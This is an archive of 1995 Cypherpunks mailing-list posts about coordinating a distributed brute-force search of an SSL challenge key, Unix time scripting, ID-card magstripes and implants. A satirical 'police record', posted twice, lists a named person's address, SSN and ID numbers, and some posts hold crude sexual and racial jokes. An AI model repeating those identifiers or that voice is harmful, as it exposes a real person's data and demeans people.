>Perhaps there should be a mechanism whereby code offered would be
>signed by various parites. When sufficient signatures have collected,
>auto-update can proceed.
>
>
>Yes, no, maybe?

No. Bypassing anecdotes about personal experiences with some .au cpunks, why
should I trust *anyone* to certify that code is auto runnable on my machine?
In secure or commercial networks, the onus is on making sure holes are not
opened up in the defences.

To me, having all these crypto links, digital envelopes, crypto filesystems,
etc all mean zero if you start offering to run code blindly from anyone.

Next.

Mark
mark@lochard.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 29 Aug 95 11:49:45 PDT
To: cypherpunks@toad.com
Subject: "Virtuosity" -- A New Movie
Message-ID: <ac67c3a90a0210044096@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I make no apologies for this not being "on topic," where "on topic" is
defined as "coding in C." If you don't like my comments to our community,
you know how to filter out my messages.

I saw "Virtuosity" today, not expecting much. It's been called "a stinker"
by at least one reviewer. But I enjoyed it.

It had fairly impressive effects and fairly accurate treatments of:

-- "microlocators" (implantable localizers)

(The technology of which, in the real world, Bob Fleming and Cherie Kushner
described at the "Cypherpunks Santa Cruz" meeting/party at my place on
Saturday. By the way, the meeting was well-attended, with 22 attendees,
including Greg Broiles from Eugene, Oregon, Jeff Simmons from San Luis
Obispo, and a bunch of folks from the Santa Cruz area and Bay Area.)

-- nanotechnology...well done

-- genetic algorithms and evolving programs...very, very well done!

-- virtual reality...less well done, especially as it's been done before

There were a few disconnects, such as that the time for the movie seemed
only a few years in the future, and yet certain technologies were very far
advanced.

I was impressed, much more so than with "The Net" or other recent high-tech
movies. (I can' t wait for "Pulp Science Fiction"!)

For those who think this off-topic, "Man does not live by coding alone."

--Tim

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Mon, 28 Aug 95 11:45:07 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <9508281844.AA22408@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


>From: Christian Wettergren <cwe@Csli.Stanford.EDU>

>What I wonder is wheter the server congestion really showed that
>the protocol is flawed.

I never meant to say that the protocol was flawed in any way.
I'm sorry if I gave this impression. (I used pretty much the same
protocol on Hal1)

Since I'm not the one who's writing the code, I will not try to tell
you how it should be written, of course.

My point was only that the central server approach does not scale.
When we reach its limit (and it seems we have not reached it yet), we
can use a hierarchical approach, and it is faster than the random one.
But the random algorithm does have its strong points and we should not
dismiss it out of hand.  Maybe I got a little carried away in my
advocating of the random algorithm.

(another topic:)
As for the updates to the client software, let me point out that I did
10 different versions of my own client when working on Hal1.  Some
machines worked for one week with version 1, while others needed many
updates, due to different network and OS conditions.  This is the main
advantage of a well-defined (and stateless) protocol: it allows the
server and clients to be all updated independently while the
computation is running.

-- Damien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Mon, 28 Aug 95 12:51:56 PDT
To: ab411@detroit.freenet.org
Subject: Re: Pre-allocating key segments
In-Reply-To: <199508281854.OAA23029@detroit.freenet.org>
Message-ID: <"swan.cl.cam.:251330:950828195006"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>> I'd prefer to keep the number of segments "lost" if a brloop ceases.
> Keep down, I guess you meant.

Indeed -- Ta.

>> ... if any keys were allocated to machines which failed to ask for another
>> segment -- you should assume that that segment was not searched.
> I agree that is the best policy -- it fails safe -- but I still think the
> prefetching of some more segments would be useful.

I'm seeing calls from calpoly.edu and albany.net taking less than a second.
Are you **REALLY** worried about wasting that sort of time, when even a single
segment usually takes a quarter of an hour even on the faster machines ?

> The goal is to suck up as many idle cycles as is practical.

I don't think a second's overhead (practical with local cache) is significant.

>> That means that if it crashes, 8 segments are left unACKed :-(
> And if it had grabbed 8 segments to begin with and crashed, it still
> would have been 8 segments left unACKed.

Sure, but I'd prefer you allocate single segments .....

> Plus, it's only 8 segments unACKed if it crashes before it finished that
> last segment, since it will start trying to ACK the first four segments
> when it finishes the fourth -- at the same time starting on the next
> four segments.

Sure.

[ Getting down to the implementation details
  1) it would be hard for brloop to know that brutessl is 3/4s done.
  2) I can't think how to do prefetching in a safe way, and without disc use
]

> Would you see it any differently if I had said, "For instance, if it has
> two segments allocated and it is halfway through the second segment, it
> should request two more segments *while* it is scanning the last segment"?

No.

If you gave me code which would guess how long the request for the next
segment will take, and then know when brutessl is that many milliseconds from
completion, and can tell that brloop isn't going to die within that time,
sure :-))


If someone supplies info for my "PS3:", I can generate central stats on what
%age of Hal3 was wasted waiting on the server.
Otherwise, brloop users will have to scan their own logs (if enabled) and work
it out (latest brloop happens to log when brutessl starts and finishes).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Mon, 28 Aug 95 13:28:20 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: SSL trouble
In-Reply-To: <9508281854.AA20060@cantina.verity.com>
Message-ID: <"swan.cl.cam.:264930:950828202725"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>> Note that it is a list, and it tries them in order (all A RRs).
> Wouldn't this result in the slaves higher in the list being hammered?

There is not "a" list ...
The list returned will be "tailored" for the calling host.
Thus an EU host will have EU sites near the front, AU hosts will have AU
servers, etc ...
(Well, maybe they'll just be returned in a random order !).

By having multiple A RRs for a name, the DNS will do the pseudo load balancing.

> Perhaps you want to do something simular to what the later releases of 
> bind do with machines with multiple names, and round robin the list.

Indeed -- as above:
1) optimise the list so that "near" servers are used.
2) cycle the servers
3) leave it to the DNS to SHUFFLE.

> If you had a list with hosts A, B, and C, the first request would get
> ABC, the next BCA, the next CAB, and the next back to ABC.  That would
> distrubute the work between the slaves a bit better.

Yup -- but if it's just "random", I'd probably use a single name ...

> Actually this is what I meant, that they would ask for it.  My idea would
> be that when a slave is asked for keyspace, if they don't have enough
> they'd ask for the next large chunk.  That way the central server doesn't
> ever have to deal with small requests.

Well, the current implementation will give what it has left, then on restarting
the main loop it notices that it has no keys left, so asks the main server for
more, so if the clients aren't all bunched up, it'll pre-fetch more segments,
so there's a fair chance the client won't have to wait :-))

>> Nah - results still go direct pro tem.
> You might consider it:)

I can always add some more A RRs to sksp-ack to load balance ...

>> These cache servers are asking for non trivial amounts of keyspace.
>> As such there should not be *too* many, and then need to be "managed" ...
>> If one crashes, the logs need to be scanned to see how to restart it (so that
>> it starts by doling out the segments that it had no sub-doled to its clients)
> Quite right.  I'd assume that the first level list of slaves would be
> controlled by you.

Possible ....

I've had various offers to host a server ...

> If you're careful enough a slave should be able to go down and come
> back up without losing any state at all.

At a cost ....

Either it has to save state in a form that's easy to reload later,
or save state in a way that it can spend some time before it starts to
	work out what it has to do [[Hmm -- I might write a script to do that]]

> All brutes/slaves talking to it should be able to continue on with no loss
> of information.

Loss of what info ?

Running brutessl's will call brclient to report the ACK.
They will report back the data as normal -- nothing to do with the Allocate
Slave -- even if it were, it would auto fallback to another server.

brloop's will ask for another keyspace, and on finding that the first server
on its list doesn't respond, it'll try the next server on its list, and if
none respond, it'll wait a bit and start asking again ...

> I would put an exponential backoff on the time between retries for the
> brutes talking to the slaves as well as the slaves talking to the master.

Well, I use a multiplicative backoff within limits ....

> (With a limit for the amount of backoff of course.)

Indeed -- how long ?

> If you can't talk to someone you might sleep for 8 seconds and retry,
> if you still couldn't back off to 16, the 32, then 64, then 128, etc...

Well, 60, 120, 180, 240, 300, 300, 300, ...

> the maximum might be somewhere around ten or fifteen minutes, so that within
> ten or fifteen minutes of crashing and being restarted everything would be
> humming along with no manual intervention required on any of the lower levels.

Well, 5 mins ... < 1/3 or a segment ...

>> However, note that with big cache servers (as opposed to Local CPU Farm
>> servers where all clients are the same "ID") reports of sub-allocation have
>> to be passed back to the root :-(
> That's a good point.  If you want to keep track of who has what, it all has
> to get back to the root eventually.

Yes -- I do -- so that it's possible to tie up requests and ACKs.

> If you use my idea of having the slaves cache the information until the next
> time they'd be contacting the root anyway, (or whenever the timer elapses,)
> then you greatly cut down on the number of small packets seen by the root,
> (and each level of slaves when their's a hierarchy).

Yup -- that's what an ACK reflector will do.

Note that Allocation and ACKs are separate ....

> <snicker;>  Sound like we could have a religious war if we wanted,

I was agreeing with you ! You said:

>>> Of course I do everything like this in C++, but I suppose perl would be the
>>> most portable.  It's a shame it's so aethestically displeasing to the eye.

or is the "it" in "shame it's so" not the preceding direct noun, i.e. C++? :-)))




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 29 Aug 95 11:41:32 PDT
To: cypherpunks@toad.com
Subject: "Citizen-Unit Identification" a Red Herring
Message-ID: <ac67e35c0e021004b325@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



All this paranoid talk about the dangers of thumbprints on ID cards, about
driver's licenses, and about magstripes got me to thinking.

So, I accessed my NLETS (National Law Enforcement Telecommunications
System) and downloaded my own record:

Citizen-Unit ASCII Name: "Timothy Christopher May"
NLETS Actual Name: G0Yj34C1qm92H7u
Known Aliases: "Klaus! von Future Prime," "Lance," "Nick Szabo"
Residence: 427 Allan Lane, Corralitos, CA 95075
Driver's License: N4197484
SSN: 227-80-5823
Passport Number: H673qop90
Race: Aryan
Origin: Europe
Hair: Brown
Eyes: Blue
Weight: 210 pounds (10/94, recorded at SFO)
Known associations: Anarchist Alliance, Young Students for Discordianism,
Vernor Vinge Fan Club, Information Liberation Front
Magazines Subscribed To: Newsweek, Playboy, The Economist, MacWeek, Anarchy
Today, Liberty, FertilizerWorld, Reason, MacUser, NewtonGazette, Bay Aryan
Events, Information Week
Consumer Preferences: beer (+++), wine (+), cigarettes (-)
Electricity Patterns: consistent with either marijuana cultivation or heavy
Net usage, or both
Threat level: Class 3 Security Threat

I don't see what the big deal is. The NLETS record implies I'm some kind of
security threat, but also correctly notes that I'm an Aryan, so I guess I'm
safe.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 29 Aug 95 11:42:01 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
Message-ID: <ac67e8b60f021004f508@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:48 PM 8/28/95, Jason L Tibbitts III wrote:
>>>>>> "TCM" == Timothy C May <tcmay@got.net> writes:
>
>TCM> At 8:52 PM 8/20/95, Hadmut Danisch wrote:
>>> These transponders are already used for many year. They inject them in
>>> pigs and cows to identify them. And some car manufacturers put the into
>>> the ignition keys as theft protections.
>
>TCM> There has so far been no known uses of this on humans, at least as a
>TCM> matter of routine. Possibly some developers have tried injecting
>TCM> themselves, for the usual reasons.
>
>Believe it or not, something like this is being used (or is being prepared
>for use) in breast implants.  An article in the Houston (silicone city)
>Chronicle about a month ago (sorry, I can't produce a more exact reference)
>stated that new soybean oil breast implants are being manufactured to
>accept an identification device to track information on the patient and the
>implanting doctor.
>
>It's not exactly big brother (bigger sister?) but it's the first
>human-implanted ID device that I've heard of.  I don't know if any have
>actually been implanted.

Big Brother? Big Sister? Naw, it's "Big Tits."

It's a way for we males to scan the females at the bar to see if they're
naturally well-endowed or silicone-enhanced. Part of the "truth in
advertising" laws recently passed.

...

Seriously, I'm awfully skeptical that any kind of remote sensing device is
to be placed in the breasts of women seeking enhancement. The technology
just does not currently support small devices, though I suppose some of the
55GG strippers could support an active transmitter (or, "transtitter").

Conceivably, when the women go down to their local doctors to have their
tits inflated there can be some kind of "taggants" added, a la the taggants
added to some explosives, but this is a far cry from an electronic
identificaton device.

Some boob must've come up with this one.

--Tim

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tibbs@sina.hpc.uh.edu (Jason L Tibbitts III)
Date: Tue, 29 Aug 95 11:45:02 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
In-Reply-To: <ac5d434c030210047d03@[205.199.118.202]>
Message-ID: <9508290348.AA14292@hpc.uh.edu>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "TCM" == Timothy C May <tcmay@got.net> writes:

TCM> At 8:52 PM 8/20/95, Hadmut Danisch wrote:
>> These transponders are already used for many year. They inject them in
>> pigs and cows to identify them. And some car manufacturers put the into
>> the ignition keys as theft protections.

TCM> There has so far been no known uses of this on humans, at least as a
TCM> matter of routine. Possibly some developers have tried injecting
TCM> themselves, for the usual reasons.

Believe it or not, something like this is being used (or is being prepared
for use) in breast implants.  An article in the Houston (silicone city)
Chronicle about a month ago (sorry, I can't produce a more exact reference)
stated that new soybean oil breast implants are being manufactured to
accept an identification device to track information on the patient and the
implanting doctor.

It's not exactly big brother (bigger sister?) but it's the first
human-implanted ID device that I've heard of.  I don't know if any have
actually been implanted.
---
  Jason L. Tibbitts III - tibbs@uh.edu - 713/743-8687 - 221SR1
System Manager:  Texas Center for Advanced Molecular Computation 
            1994 PC800 "Kuroneko"      DoD# 1723




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 29 Aug 95 11:38:05 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits and a Hello
Message-ID: <199508290556.WAA12070@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain



>What is the capacity of the mag strips. Do they carry much more than some
>ID code for computer reference? It seems unlikely that there is enough
>storage
>for a thumbprint. Some vitals perhaps, but again it would most likely simply
>be a speedier way of referencing the card holder's supposed True Name. (After
>all they'd have to be checking driving record information as well.) Still
>decrypting the cards would be amusing, just to aggravate those who become to
>used to the convienience. 'Oh.. sorry Governor Wilson... my but you look
>different up close'.

They would not have to include an entire thumbprint.  The actual code used
to verify fingerprints is not very large.  All that would be needed is
enough information to ID into the "official" records and enough checksum
type information to prevent alteration/counterfitting.  Using magnetic media
for this is a bit foolish as it can be changed/destroyed with the stroke of
a magnet.  I will not say by what means I would think should suit as a
better encoding scheme because: 1) They are not using it and 2) I do not
want to give them any ideas.

|            Visualize whirled keys!              | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites    | Disclaimer:          |
|all mankind free in one-key-stenography-privacy!"| Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 29 Aug 95 11:38:43 PDT
To: cypherpunks@toad.com
Subject: Claiming chunks of keyspace...
Message-ID: <ac67f81d130210049392@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Looking at it from the outside, I thought the latest SSL challenge
experiences were highly instructive. Nothing to be ashamed of.

An interesting question: Is it a valid approach for J. Random User to
"claim" some chunk of keyspace to search?

If the "reward" of finding the gold buried in the keyspace (a key that
meets the  challenge) is high and the cost of claiming the keyspace is low
(or nil), then game theory tells us that some folks will be tempted to
claim a bigger chunk of keyspace than they can possibly process.

What can be done to reduce this effect?

On the negative side, ostracize or punish those who bite off more than they
can chew. This approach is fraught with dangers.

On the positive side, let everyone simply attack the keyspace as they see
fit, picking random parts to attack. This should not be "worse" than a
factor of several from a "perfectly coordinated" attack. (I haven't spent
time calculating this, but my intuition is that a random attack, with
overlapping keyspace, is not a lot less efficiently attacked than
attempting to arrange for no overlaps...just based on my mental picture of
dropping line segments randomly on some interval and figuring coverage of
the line segment.)

In between, market systems where itermediate agents subcontract out chunks
of keyspace. Mechanisms for this are lacking.

-Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Mon, 28 Aug 95 20:44:28 PDT
To: sjb@austin.ibm.com
Subject: Re: SSL trouble
Message-ID: <199508290338.XAA24000@interport.net>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner writes:
> Then what do you care about the group's procedures?  It
> doesn't "prevent you from participating" --- you *aren't*
> participating. You're attempting to solve the problem on your
> own.

  This distinction is valid in the current series of academic
exercises.  However, if we were actually trying to break
something important, anything that might accelerate the crack
would be a form of participation.  And as Nathan Loofbourrow has
pointed out, the random method is much more secure against
real-world retaliation.  It's also the only method that will
work for me; I use a shell account, and I never know in advance
when I will get time on the computers at work (which aren't on
the net at all).

  I _don't_ care about the procedures, as long as I can get the
information I need to go my own way.


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Tue, 29 Aug 95 11:43:22 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Florida Drivers Permits
In-Reply-To: <199508290035.RAA08342@ix3.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.950829001403.7528A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



> 
> At 09:55 AM 8/29/95 +1000, Mark wrote:
> >>>Better would be to figure out the encoding scheme and post it here.
> >>I like this, myself.  It'd be nice to be able to have the picture of my
> >>choosing instead of a digitized thumbprint...
> >
> >I think the officer arresting you would frown if your license dumped a nudie
> >picture of Cindy Crawford instead of your identification details.

Or of Mel Gibson.


00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Tue, 29 Aug 95 11:42:31 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <199508290435.AAA11757@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

"Daniel R. Oelke" <droelke@rdxsunhost.aud.alcatel.com> writes:
>someone, probably either patrick@Verity.COM or hallam@w3.org, writes:
>>Piete.Brooks@cl.cam.ac.uk, stripes@va.pubnix.com writes:
>>
>>> I'd like to get the raw date in brloop (a sh script). In perl I'd just
>>> use "time", and I can't see a way to get "date +" to yield the raw time.
>>> I could use "date=`perl -e 'print time'`" but that seems OTT, and perl
>>> may not be on teh users PATH. Any suggestions ?
>>
>>"date '+%s'" does it under BSDI, but I'm not sure how portable it is.
>>
>
>That doesn't work under SunOS 4.1.x, but this does:
>
>   date "+%S %M 60 * + %H 3600 * + %j 86400 * + %y 31536000 * + p" | dc
>
>This assumes 365 days/year, so if you jump from a leap year to a non-leap
>year it won't work right.  Hey - a 1/1460 failure rate is better
>than most Windoze programs I've used ;-)
>
>It also isn't the "absolute" time, (as given by time()), but
>gives a number of seconds that constantly increases.
>
>With a little more work you should be able to adjust this to be close
>to time() functionality.

This was, of course, originally one long line:

date +"%S %M 60 * + %H 3600 * + %j 1 - 86400 * + %y 70 - 31536000 * + %y 
69 - 4 / 86400 * + 3600 4 * + p" |dc

Differences: %j 1 -, because days of the year are numbered from 1, not
zero, and we don't want to count 86400 seconds for today before today
has finished.

%y 70 -, because 1970 is the epoch, of course.

%y 69 - 4 / 86400 * +, takes into account all leap days in all leap years
up through last year.  Why?  Left as an exercise for the reader.  ;-)

3600 4 * +, this is a bit of ugliness.  date +%s returns GMT for me.
I'm in EDT, so that's four hours away from GMT.  So this is necessary to
make this return the same number as date +%s.  But if you're in another
time zone, you need to change that 4 above appropriately.  If this whole
section is deleted we are left with:

date +"%S %M 60 * + %H 3600 * + %j 1 - 86400 * + %y 70 - 31536000 * + %y
69 - 4 / 86400 * + p" |dc

which returns local time, which is probably what you wanted anyway.

By the way, date --version, on my system, returns "GNU shellutils 1.9.4",
just in case you were wondering what date I'm using.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEKT+REcrOJethBVAQEXgAQAx9HLiR+LPvclEYRFrliqOugj9cbzGwLD
HCWOC8/MfrXuS3MPLQj1HugA18LH/LGy3BTp7cSnSNXDoL2/7UkLeAspGejRrEG4
WgQ8HIC2weVDP66PqioFD6lAELatRWk4Xl/mLgVrxluBrKtRnADtCX/VdHPw1ZiU
YDfiWBtKRGU=
=i1Di
-----END PGP SIGNATURE-----

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Tue, 29 Aug 95 00:33:25 PDT
To: cypherpunks@toad.com
Subject: Sendmail Bugs
Message-ID: <199508290733.BAA01311@wero>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This has nothing to do with crypto, and is only remotely related to 
remailers. However, I thought I'd send it along to demonstrate to our 
conspiracypunks friends how to shorten the length of an off-topic post.

There is a document on alt.security which describes exploitable sendmail
bugs. The reference is <809544856snz@hacknet.demon.co.uk>
I saved a copy in case anyone would like one.

SEE! Now wasn't that easy!

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMELCW8La+QKZS485AQGWMQL8DycUwDwZ9ACaLo27o6fUrqoz3KAXJB4C
fz6FHp6LLBbTDpPQoSgYfhcYtpySs7IuXvr5ja+/qNFi6Jq6M98WBvFMuLug8HsR
8IFvu+KVF1VSJ8EOAcdQ9MEAs3m+Zbk0
=YZjS
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Mon, 28 Aug 95 17:50:19 PDT
To: cypherpunks@toad.com
Subject: Re: Bet e$ on how long it will take for PGPFone to make it overseas!
Message-ID: <199508290050.AA11863@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Censored Girls Anonymous sez:

: I thought I saw a version over at ftp.hacktic.nl already. 
: I tawt I taw a puddy tat. I did, I did taw a puddy tat!
: And it's been in the incoming directory for all weekend too!

It's now relocated to ftp.hacktic.nl:/pub/pgp/pgpfone

Also aussie SSL and SSLapps have been made available at
 /pub/crypto/SSL
 /pub/crypto/SSLapps

A dir has been added for Crypto Libraries (Wei Dei, RSAREF and DES)
 /pub/crypto/LIBS

Also a dir has been added for Crypto apps (CFS, SSH CTCP etc)
 /pub/crypto/CRYPTOapps

Enjoy !
--
Alex de Joode		Replay Communication and Internet Services
usura@replay.com	Inet Consulting, Web Authoring, Trademark
http://www.replay.com	and Copyright Consultancy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Tcmay@got.net)
Date: Wed, 20 Sep 95 16:25:17 PDT
To: cypherpunks@toad.com
Subject: "CITIZEN-UNIT IDENTIFICATION" A RED HERRING
Message-ID: <9509201546155269@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Mon, 28 Aug 1995 21:44:12 -0700
To: cypherpunks@toad.com
From: tcmay@got.net (Timothy C. May)
Subject: "Citizen-Unit Identification" a Red Herring


All this paranoid talk about the dangers of thumbprints on ID cards, about
driver's licenses, and about magstripes got me to thinking.

So, I accessed my NLETS (National Law Enforcement Telecommunications
System) and downloaded my own record:

Citizen-Unit ASCII Name: "Timothy Christopher May"
NLETS Actual Name: G0Yj34C1qm92H7u
Known Aliases: "Klaus! von Future Prime," "Lance," "Nick Szabo"
Residence: 427 Allan Lane, Corralitos, CA 95075
Driver's License: N4197484
SSN: 227-80-5823
Passport Number: H673qop90
Race: Aryan
Origin: Europe
Hair: Brown
Eyes: Blue
Weight: 210 pounds (10/94, recorded at SFO)
Known associations: Anarchist Alliance, Young Students for Discordianism,
Vernor Vinge Fan Club, Information Liberation Front
Magazines Subscribed To: Newsweek, Playboy, The Economist, MacWeek, Anarchy
Today, Liberty, FertilizerWorld, Reason, MacUser, NewtonGazette, Bay Aryan
Events, Information Week
Consumer Preferences: beer (+++), wine (+), cigarettes (-)
Electricity Patterns: consistent with either marijuana cultivation or heavy
Net usage, or both
Threat level: Class 3 Security Threat

I don't see what the big deal is. The NLETS record implies I'm some kind of
security threat, but also correctly notes that I'm an Aryan, so I guess I'm
safe.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Tcmay@got.net)
Date: Wed, 20 Sep 95 16:25:01 PDT
To: cypherpunks@toad.com
Subject: CLAIMING CHUNKS OF KEYSPACE...
Message-ID: <9509201546165270@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Mon, 28 Aug 1995 23:02:01 -0700
To: cypherpunks@toad.com
From: tcmay@got.net (Timothy C. May)
Subject: Claiming chunks of keyspace...


Looking at it from the outside, I thought the latest SSL challenge
experiences were highly instructive. Nothing to be ashamed of.

An interesting question: Is it a valid approach for J. Random User to
"claim" some chunk of keyspace to search?

If the "reward" of finding the gold buried in the keyspace (a key that
meets the  challenge) is high and the cost of claiming the keyspace is low
(or nil), then game theory tells us that some folks will be tempted to
claim a bigger chunk of keyspace than they can possibly process.

What can be done to reduce this effect?

On the negative side, ostracize or punish those who bite off more than they
can chew. This approach is fraught with dangers.

On the positive side, let everyone simply attack the keyspace as they see
fit, picking random parts to attack. This should not be "worse" than a
factor of several from a "perfectly coordinated" attack. (I haven't spent
time calculating this, but my intuition is that a random attack, with
overlapping keyspace, is not a lot less efficiently attacked than
attempting to arrange for no overlaps...just based on my mental picture of
dropping line segments randomly on some interval and figuring coverage of
the line segment.)

In between, market systems where itermediate agents subcontract out chunks
of keyspace. Mechanisms for this are lacking.

-Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 29 Aug 95 04:41:53 PDT
To: ecm@ai.mit.edu
Subject: e$: A CALL FOR FOUNDERS: The Boston Society for Digital Commerce
Message-ID: <v02120d02ac61470af9db@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


                     A CALL FOR FOUNDERS
            The Boston Society for Digital Commerce


A few weeks ago, before my San Francisco trip, I had a great
lunch with Peter Cassidy, a contract writer and industrial analyst.
Cassidy writes stuff on digital commerce and other net.things for the
Economist, Wired and a number of other drier trade rags and authors the
occassional market research piece for industrial research firms around
Boston.

As disparate our backgrounds and life experiences may be, our luncheon was
reminiscent of the original AA meeting.  We gibbered at each other for two
hours about strong crytography and the enormous potential of Web-mediated
commerce and the effects of both on life, the universe, and everything.
It was marvelous for two informed parties to share thoughts on the
substance of the revolution at hand, undistracted by hype and hyperbole
that too often haunts these subjects.

I went on to hang out that night with a couple of pals from my school
days at Chicago and they had *no* idea what I was talking about, though
they could tell it had me pretty animated.

Both Peter and I figured we needed to have a regular fix of this, and we both
figured that there are others in Boston who would benefit from the same
experience. People in Boston who have someunderstanding of the financial
markets, the internet, strong cryptography and the consequences of
mixing the three: digital certificates, the potential for absolute
anonymity, and geodesic markets for everything from financial instruments
to software to professional services.

People in Boston who would like to meet once a month or so in a function
room somewhere downtown, have lunch, and listen to a speaker or see a
net.demo, or just hang out and gab on some aspect of digital commerce.

So, to quote Andy Hardy, "I've got a barn!  Let's have a show!".
I've made some calls, and I can get a meeting room for a couple of hours
and a nice lunch for 20 people in downtown Boston for about $25 a head as
a starting point, subject to demand and scalability.

I figure the agenda of the first meeting will be an introduction
of everybody, and organizing some kind of structure for further meetings:
programming and anything else we need to do to get the next meeting(s)
